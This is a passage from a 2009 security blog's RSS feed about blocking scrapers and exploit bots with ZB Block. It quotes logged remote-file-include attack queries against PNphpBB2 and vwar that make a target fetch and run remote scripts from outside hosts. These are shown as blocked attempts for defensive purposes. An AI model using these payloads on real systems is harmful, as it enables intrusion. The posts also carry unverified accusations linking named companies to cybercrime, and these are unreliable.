      service. Test Trigger to test function.&lt;br&gt;Query: xtestx4&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; 
      .NET CLR 1.1.4322; .NET CLR 2.0.50727)&lt;br&gt;Reconstructed URL: http:// 
      www.spambotsecurity.com /?xtestx4&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      &lt;a target=&quot;_blank&quot; name=&quot;avairy.com getting sent a 'you've been bad' message. Click for larger image in new window.&quot; title=&quot;avairy.com getting sent a 'you've been bad' message. Click for larger image in new window.&quot; href=&quot;http://www.spambotsecurity.com/blog/images/ai3.gif&quot;&gt;&lt;img src=&quot;http://www.spambotsecurity.com/blog/images/ai3thn.gif&quot; height=&quot;240&quot; alt=&quot;avairy.com getting sent a 'you've been bad' message. Click for larger image in new window.&quot; border=&quot;0&quot; width=&quot;320&quot; align=&quot;left&quot;&gt;
      &lt;/a&gt;I also used their services, if they check their logs, to send them a 
      &amp;quot;you've been bad, so here's the scoop, all you get for Christmas is 
      snowman poop!&amp;quot; message. And, here's the logging of that hit. (Which 
      actually came before the previous image, but cemented FortressITX / 
      pwebtech's doom.)
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot; size=&quot;3&quot;&gt;#: 6897 @: Mon, 13 Jul 2009 11:51:10 -0600&lt;br&gt;Host: 
      65.98.13.118&lt;br&gt;IP: 65.98.13.118&lt;br&gt;Score: 1&lt;br&gt;Why blocked: Test 
      Trigger to test function.&lt;br&gt;Query: 
      xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; 
      .NET CLR 1.1.4322; .NET CLR 2.0.50727)&lt;br&gt;Reconstructed URL: http:// 
      www.spambotsecurity.com 
      /?xtestx=your_site_is_an_unregulated_proxy_server_used_by_hackers_and_will_be_added_to_the_signatures_of_ZB_block 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      I would be remiss if I didn't mention &lt;a target=&quot;_blank&quot; name=&quot;Good article on this subject. Click to go there in a new window.&quot; title=&quot;Good article on this subject. Click to go there in a new window.&quot; href=&quot;http://incredibill.blogspot.com/2008/09/exploring-tynted-web.html&quot;&gt;IncrediBILL's 
      Random Rants&lt;/a&gt;, his pages first turned me onto a good description of 
      this kind of problem. (Also, previous logs were showing hacking attempts 
      from tynt.com / tynted.net).
    &lt;/p&gt;
    &lt;p&gt;
      Zap! &lt;img src=&quot;http://www.spambotsecurity.com/forum/images/smilies/violence/axechase.gif&quot; alt=&quot;Chasing them with an axe!&quot;&gt;&amp;#160;
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/07-01-2009_07-31-2009.php#52</link>
<guid>http://www.spambotsecurity.com/blog/archives/07-01-2009_07-31-2009.php#52</guid>

<category>Bad User Client</category>

<category>Content Thieves</category>

<category>Security Musings</category>

<pubDate>Mon, 13 Jul 2009 14:01:15 -0600</pubDate>
</item>

<item>
<title>Booyeah! Nailed one to the wall! Scratch one bot variant.</title>
<description>&lt;p&gt;
      I gots me a trophy!
    &lt;/p&gt;
    &lt;p&gt;
      *** BEGIN MESSAGE ***
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Dear Sir or Madam, &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Thank you for your email to Avira's virus lab. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Tracking number: (REMOVED). &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;A listing of files alongside their results can be 
      found below:&lt;/font&gt;
    &lt;/p&gt;
    &lt;table border=&quot;1&quot; width=&quot;50%&quot;&gt;
      &lt;tr&gt;
        &lt;td&gt;
          File ID
        &lt;/td&gt;
        &lt;td&gt;
          Filename
        &lt;/td&gt;
        &lt;td&gt;
          Size (Byte)
        &lt;/td&gt;
        &lt;td&gt;
          Result
        &lt;/td&gt;
      &lt;/tr&gt;
      &lt;tr&gt;
        &lt;td&gt;
          25382358
        &lt;/td&gt;
        &lt;td&gt;
          mucil_idle.txt
        &lt;/td&gt;
        &lt;td&gt;
          39.07 KB
        &lt;/td&gt;
        &lt;td&gt;
          MALWARE
        &lt;/td&gt;
      &lt;/tr&gt;
    &lt;/table&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Please find a detailed report concerning each 
      individual sample below: &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;The file 'mucil_idle.txt' has been determined to 
      be 'MALWARE'. Our analysts named the threat &lt;/font&gt;&lt;font size=&quot;5&quot; color=&quot;#ffff00&quot;&gt;&lt;b&gt;PHP/IrcBot.F&lt;/b&gt;&lt;/font&gt;&lt;font color=&quot;#ffcccc&quot;&gt;. 
      The term &amp;quot;PHP/&amp;quot; denotes a PHP scriptvirus.Detection will be added to our 
      virus definition file (VDF) with one of the next updates. &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Alternatively you can see the analysis result 
      here: &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED) 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;An overview of all your submissions can be found 
      here: &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;http://analysis.avira.com/samples/details.php?uniqueid=(REMOVED) 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Please note: If you have specific questions please 
      address them to support@avira.com &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Kind regards &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffcccc&quot;&gt;Avira Virus Lab&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      *** END OF MESSAGE ***
    &lt;/p&gt;
    &lt;p&gt;
      Interesting things happen when I modify a version of ZB Block on another 
      site to return a false success to a scanning probe... like actually 
      taking some scum off the streets, rather than just stopping the attack 
      their probes were trying.
    &lt;/p&gt;
    &lt;p&gt;
      I hereby declare &lt;b&gt;PHP/IrcBot.F&lt;/b&gt; to be my first kill, in what I hope 
      to be a string of many! And to those who might not like this news, all I 
      can say is, you knew it was coming.
    &lt;/p&gt;
    &lt;p&gt;
      Zap! &lt;img alt=&quot;Chasing them with an axe!&quot; src=&quot;http://www.spambotsecurity.com/forum/images/smilies/violence/axechase.gif&quot;&gt;&amp;#160;
    &lt;/p&gt;
    &lt;p&gt;
      P.S. I might also mention here, that those of you running ZB Block were 
      naturally immune to this infection vector. My modification just had to 
      do with modifying the output of ZB Block to cause the virus to think it 
      had found an infectable machine, by returning the proper code to it.
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/06-01-2009_06-30-2009.php#46</link>
<guid>http://www.spambotsecurity.com/blog/archives/06-01-2009_06-30-2009.php#46</guid>

<category>Bad User Client</category>

<category>Exploit Bot</category>

<category>Scan Bot</category>

<category>Security Musings</category>

<category>Spam Bot</category>

<category>Stupid Bot</category>

<pubDate>Fri, 26 Jun 2009 20:26:44 -0600</pubDate>
</item>

<item>
<title>PROOF THAT DEDIBOX.FR IS HOSTILE, and possibly laycat too.</title>
<description>&lt;p&gt;
      Remember what I said about no one notices the robber casing the joint, 
      but everyone notices when he's committing / committed the crime? 
      Remember my go-arounds with laycat.com, kyklo.com, aceleo.com, and their 
      more than willing to share IP space host, dedibox.fr?
    &lt;/p&gt;
    &lt;p&gt;
      Witness if you will, a vengeance script attack on a well defended 
      website with two doors, and the results that are gleaned when a quick 
      minded sentry is guarding one of those doors. The problem is, the other 
      door, the one our attacker will go through, does not lead to 
      satisfaction, but a grim reminder that they have stepped into... The &lt;i&gt;&lt;b&gt;Toilet 
      Zone&lt;/b&gt;&lt;/i&gt;.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot;&gt;#: 6594 @: Tue, 14 Apr 2009 13:53:55 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 4&lt;br&gt;Why blocked: 
      General board attack, [a] does not belong in query. Unescaped question 
      mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query: 
      name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%27.include($_GET[a]),exit.%27&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%27.include($_GET[a]),exit.%27&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Through:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot;&gt;#: 6625 @: Tue, 14 Apr 2009 14:21:17 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 4&lt;br&gt;Why blocked: 
      General board attack, [a] does not belong in query. Unescaped question 
      mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query: 
      name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Then again:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;#: 6627 @: Tue, 14 Apr 2009 14:26:40 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 4&lt;br&gt;Why blocked: 
      General board attack, [a] does not belong in query. Unescaped question 
      mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query: 
      name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Through:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;#: 6633 @: Tue, 14 Apr 2009 14:27:14 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 4&lt;br&gt;Why blocked: 
      General board attack, [a] does not belong in query. Unescaped question 
      mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query:name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;t=8/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=%2527.include($_GET[a]),exit.%2527&amp;amp;a=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Changing method to:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot;&gt;#: 6634 @: Tue, 14 Apr 2009 14:40:50 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 3&lt;br&gt;Why blocked: 
      Unescaped question mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query:name=PNphpBB2&amp;amp;file=posting&amp;amp;mode=quote/index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;p=34004/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=posting&amp;amp;mode=quote/index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;p=34004/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Through:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ffff00&quot;&gt;#: 6644 @: Tue, 14 Apr 2009 14:44:57 -0600&lt;br&gt;Host: 
      sd-16692.dedibox.fr&lt;br&gt;IP: 88.191.89.65&lt;br&gt;Score: 3&lt;br&gt;Why blocked: 
      Unescaped question mark in query. Remote file include attack (http). RBN.&lt;br&gt;Query:name=PNphpBB2&amp;amp;file=posting&amp;amp;mode=quote/index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;p=34004/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt????&lt;br&gt;Referer:&lt;br&gt;User 
      Agent: Mozilla/5.0&lt;br&gt;Reconstructed URL: http:// zaphodb777.dyndns.org 
      ///index.php?name=PNphpBB2&amp;amp;file=posting&amp;amp;mode=quote/index.php?name=PNphpBB2&amp;amp;file=viewtopic&amp;amp;p=34004/viewtopic.php?p=15&amp;amp;sid=be4c914eb746ac7c96beea717fdfc692/&amp;amp;highlight=http://sindepol.com.br/images/copyright%5B1%5D.txt???? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Oh no, not again, just 2 this time...
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;#: 6663 @: Wed, 15 Apr 2009 00:20:15 -0600&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Host: 
      sd-16692.dedibox.fr&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;IP: 88.191.89.65&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Score: 
      3&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Why blocked: Unescaped question mark 
      in query. Remote file include attack (http). RBN.&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Query: 
      p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Referer:&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;User 
      Agent: Mozilla/5.0&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Reconstructed URL: 
      http:// zaphodb777.dyndns.org 
      /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt?? 
      &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      and...
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;#: 6664 @: Wed, 15 Apr 2009 00:20:27 -0600&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Host: 
      sd-16692.dedibox.fr&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;IP: 88.191.89.65&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Score: 
      3&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Why blocked: Unescaped question mark 
      in query. Remote file include attack (http). RBN.&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Query: 
      p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Referer:&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;User 
      Agent: Mozilla/5.0&lt;/font&gt;&lt;br&gt;&lt;font color=&quot;#ff0000&quot;&gt;Reconstructed URL: 
      http:// zaphodb777.dyndns.org 
      /forum/viewtopic.php?p=58%20%20///vwar/backup/errors.php?error=http://www.tos-belarus.org/scan/copyright.txt??&lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      Now I know that none of these attacks came from laycat.com , aceleo.com 
      , or kyklo.com adresses themselves. But I have shown, beyond reasonable 
      doubt, that laycat uses other IPs in the dedibox.fr domain with great 
      freedom and regularity. Draw your own conclusions, but I say they're 
      RIDIN' DIRTY.
    &lt;/p&gt;
    &lt;p&gt;
      Please note that attack 3, consisting of 11 shots, occurred in 7 
      seconds, almost 2 slams a second... ZB Block, handled it with grace, and 
      did as it was supposed to.
    &lt;/p&gt;
    &lt;p&gt;
      All in all, it looks like I caught me a weasel in the hen house, 
      dedibox.fr is now attacksville forever, and I suggest that whatever 
      method of blocking your site uses, that you ban the domain dedibox.fr 
      until I see some good reason that their server needs to surf your site.
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#39</link>
<guid>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#39</guid>

<category>Exploit Bot</category>

<category>RBN</category>

<pubDate>Wed, 15 Apr 2009 02:05:19 -0600</pubDate>
</item>

<item>
<title>Blocking the *.amazonaws.com domain with ZB Block, and why.</title>
<description>&lt;p&gt;
      This domain has been a continual source of content theft and hacking 
      attempts.
    &lt;/p&gt;
    &lt;p&gt;
      Now first, I must admit that I have seen a couple good services using a 
      *.amazonaws.com domain name, but all of the domain names are cryptic, 
      and you just can't be sure you aren't dealing with a spoofed user client 
      string. Now onto some finds!
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;&lt;b&gt;Tynted&lt;/b&gt;&lt;/font&gt;&lt;br&gt;Host: 
      ec2-67-202-60-246.compute-1.amazonaws.com&lt;br&gt;User Agent: Java/1.6.0_02
    &lt;/p&gt;
    &lt;p&gt;
      Here's the most egregious of the lot, tynt.com. This site claims 
      straight out that it's copying the content of your site. Who da #&amp;amp;*%! 
      gave them that right, especially when I claim copyright? Also, they will 
      cause duplicate content to appear on the web, and in the eyes of google, 
      this messes up your page rank, badly! But, that's not the worst thing...
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;EVEN WORSE&lt;/i&gt; tynt.com / tynted.net act as a 
      no-registration-required proxy server! This allows previously blocked 
      hackers, to come right back in and start pushing, pulling, tweaking, and 
      investigating your site. This bad behaviour was the genesis of me 
      blocking them. This by itself is bad, but wait, there's MORE...
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;&lt;b&gt;REDIFF&lt;/b&gt;&lt;/font&gt;&lt;br&gt;Host: 
      ec2-72-44-45-196.compute-1.amazonaws.com&lt;br&gt;User Agent: rdfbot/1.0 
      (Indian Language Web Search Engine; Rediff.com; rdfbotsupport AT 
      rediffmailpro DOT com)
    &lt;/p&gt;
    &lt;p&gt;
      No habla hindi senõr! This is actually a content scraper, and their site 
      seemed to be in English.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;&lt;b&gt;SimilarPages&lt;/b&gt;&lt;/font&gt;&lt;br&gt;Host: 
      ec2-174-129-187-47.compute-1.amazonaws.com&lt;br&gt;User Agent: 
      SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; 
      http://www.similarpages.com; info@similarpages.com)
    &lt;/p&gt;
    &lt;p&gt;
      If this isn't saying &amp;quot;Hi, I'm an SEO scraper!&amp;quot; I don't know what it's 
      saying. Buhbyenow. Usually Nutch is used by scrapers.
    &lt;/p&gt;
    &lt;p&gt;
      &lt;font color=&quot;#ff0000&quot;&gt;&lt;b&gt;Conductor&lt;/b&gt;&lt;/font&gt;&lt;br&gt;Host: 
      ec2-72-44-52-94.compute-1.amazonaws.com&lt;br&gt;User Agent: Caliperbot/1.0 
      (+http://www.conductor.com/caliperbot)&lt;br&gt;
    &lt;/p&gt;
    &lt;p&gt;
      They say (&lt;a title=&quot;From their site.&quot; href=&quot;http://www.conductor.com/linking-solution/publishers/monetizing-unused-inventory&quot; target=&quot;_blank&quot; name=&quot;From their site.&quot;&gt;here&lt;/a&gt;): 
      &amp;quot;Perfect ads are only possible when the publisher retains 100% editorial 
      control over content and advertising. It's possible with Conductor. If 
      interested, first review our publisher requirements and then submit your 
      site for review.&amp;quot;
    &lt;/p&gt;
    &lt;p&gt;
      I say: &amp;quot;I never submitted my site for review, so why are you here? I 
      use, and am happy with adsense.&amp;quot;
    &lt;/p&gt;
    &lt;p&gt;
      They say (&lt;a title=&quot;From their site.&quot; href=&quot;http://www.conductor.com/linking-solution/marketers/importance-of-ranking-well&quot; target=&quot;_blank&quot; name=&quot;From their site.&quot;&gt;here&lt;/a&gt;): 
      &amp;quot;So if you can compete with those other articles, other competitors, 
      those other affiliates and aggregators that are in front of you - you 
      can discover millions of dollars of revenue every year - without even 
      taking into consideration brand value or the synergy that results when 
      you appear on the first page in both paid and natural search.&amp;quot;
    &lt;/p&gt;
    &lt;p&gt;
      I say: &amp;quot;So you're really keyword spamming SEO scum. Get lost. My site is 
      high ranked for content, not stolen words.&amp;quot;
    &lt;/p&gt;
    &lt;p&gt;
      ***
    &lt;/p&gt;
    &lt;p&gt;
      I am sure there will be more as time goes on, the &lt;font color=&quot;#ffff00&quot;&gt;next 
      version of ZB Block's signatures should have bypasses&lt;/font&gt; for the 
      valid bots (currently under test), but for now, the AmazonAWS cloud is 
      banned.
    &lt;/p&gt;
    &lt;p&gt;
      Zap.
    &lt;/p&gt;
    &lt;p&gt;
      UPDATE: The bypasses are in. Amazon AWS can be blocked from your site 
      with impunity, without harming any valid search engines.
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#36</link>
<guid>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#36</guid>

<category>Content Thieves</category>

<category>Odd Bot</category>

<category>Scrape Bot</category>

<pubDate>Sat, 11 Apr 2009 14:58:28 -0600</pubDate>
</item>

<item>
<title>Stop Keyword Poaching - It's mutiny on your bounty!</title>
<description>&lt;p&gt;
      You may notice that now ZB Block is blocking SEO keyword scrapers. You 
      may ask just what they are, and why I am directing your site to block 
      it. Well, I will do my best to fill you in on the scoop.
    &lt;/p&gt;
    &lt;p&gt;
      First off, no keyword scraping SEO robot ever drove traffic to YOUR 
      site. Quite the opposite, they attempt to tear traffic away from your 
      site. Worse, they try to do this by fooling the legitimate search 
      engines, and they make money in the process. Even beyond this, some of 
      these are known to feed the Russian Business Network (A giant cybercrime 
      conglomerate). They RBN is interested in this so they can make bogus 
      pages (especially security related) that have high page ranks, to 
      attract those with legitimate interest, away to pages with bogus scam 
      software (Like the very evil AntiVirusPro XP 2010, otherwise known as 
      Troj/FakeXPA).
    &lt;/p&gt;
    &lt;p&gt;
      Let's use a probable hypothetical example, one that happens far too 
      often, to describe this:
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;*&lt;font color=&quot;#00cccc&quot;&gt;John, an expert in the field of wonder 
      widgets, decides to share his knowledge with the world on the best way 
      to care for and maintain wonder widgets. He works long and hard on a 
      site describing how to do this, and even how you can make your own 
      wonder widget if you can't afford to buy one. His site is very 
      informative, and well written, and the great google gods decide to give 
      him a good page rank as an award for his hard labor. &lt;/font&gt;&lt;/i&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;&lt;font color=&quot;#00cccc&quot;&gt;The SEO botmasters notice his up and coming 
      star, and decide to scrape his site for keyword content, and build a 
      profile of his site. &lt;/font&gt;&lt;/i&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;&lt;font color=&quot;#00cccc&quot;&gt;Then, Gidget's Gadgets notices that their 
      business is failing a little, and hires a SEO firm to find out why. The 
      SEO firm compares keywords in her site, to known profiles of other 
      sites, and finds that John's site, and wonder widgets, have a lot in 
      common with the gadgets that Gidget sells. Not caring that they aren't 
      the same product, and each one fills a different, but related niche, 
      they then sell the keywords that John has, to Gidget. Gidget adds these 
      keywords into her site, and her page rank goes up a bit on these words, 
      and John's pagerank gets diluted.&lt;/font&gt;&lt;/i&gt;&lt;font color=&quot;#00cccc&quot;&gt; &lt;/font&gt;
    &lt;/p&gt;
    &lt;p&gt;
      &lt;i&gt;&lt;font color=&quot;#00cccc&quot;&gt;Now John's visits drop, and people are no 
      longer getting helped. Gidget's site gets much more traffic, but she 
      isn't making sales, because people really want wonder widgets, and her 
      drop is sales was due to market saturation of gadgets, not a competing 
      site. Now no one is happy... except the SEO company that has Gidget's 
      money.&lt;/font&gt;*&lt;/i&gt;
    &lt;/p&gt;
    &lt;p&gt;
      This sort of behavior is in the realm of keyword spamming, it helps no 
      one. Keyword spam turns the internet into a sargassosistic morass of 
      false leads generated by tricked search engines, that just cause more 
      traffic overload, and more confused, and frustrated innocent victims.
    &lt;/p&gt;
    &lt;p&gt;
      Someday, search engines may find a way to stop this, but for now, and 
      until the expiration of P.T. Barnum's Maxim &amp;quot;You can fool all of the 
      people some of the time, some of the people all of the time, but not all 
      of the people all of the time.&amp;quot;, and until the invention of decent AI, 
      keyword spam will be a threat. Your best defense is to send the SEO bots 
      packing with something like ZB Block, while welcoming legitimate search 
      bots with open arms.
    &lt;/p&gt;
    &lt;p&gt;
      ~Zaphod
    &lt;/p&gt;
    &lt;p&gt;
      P.S. Thanks WY G&amp;amp;F for a title idea. To be honest, it fits!
    &lt;/p&gt;</description>
<link>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#25</link>
<guid>http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php#25</guid>

<category>Content Thieves</category>

<category>Scrape Bot</category>

<category>Spam Bot</category>

<pubDate>Wed, 08 Apr 2009 13:09:05 -0600</pubDate>
</item>

<item>
<title>Guess who?</title>
<description>&lt;p&gt;
  Look who ignored robots.txt again after a couple of weeks.
&lt;/p&gt;
&lt;p&gt;
  &lt;font size=&quot;3&quot; color=&quot;#ffff00&quot;&gt;#: 479 @: Mon, 30 Mar 2009 09:20:47 -0600&lt;br&gt;Host: 
  laycat.com&lt;br&gt;IP: 88.191.79.43&lt;br&gt;Score: 1&lt;br&gt;Why blocked: Exploit 
  probe? Possibly RBN? Claims to be search engine in dev. No 3rd party 
  info on this. Ignores robots.txt.&lt;br&gt;File: removed for security&lt;br&gt;Post:&lt;br&gt;Query:&lt;br&gt;Referer:&lt;br&gt;User 
  Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)&lt;br&gt;Reconstructed 
  URL: http://www.spambotsecurity.com/&lt;/font&gt;&lt;br&gt;
&lt;/p&gt;
&lt;p&gt;
  So it's obviously not caching robots.txt, and having problems with it 
  propogating to the scanners as they have claimed in an e-mail.
&lt;/p&gt;
&lt;p&gt;
  So now they are permanently &amp;#167;H&amp;#238;tlisted as being part of the Russian 
  Business Network. I have no doubts now... Oh wait, they might say that 
  one was before they pulled robots.txt... but explain this one you 
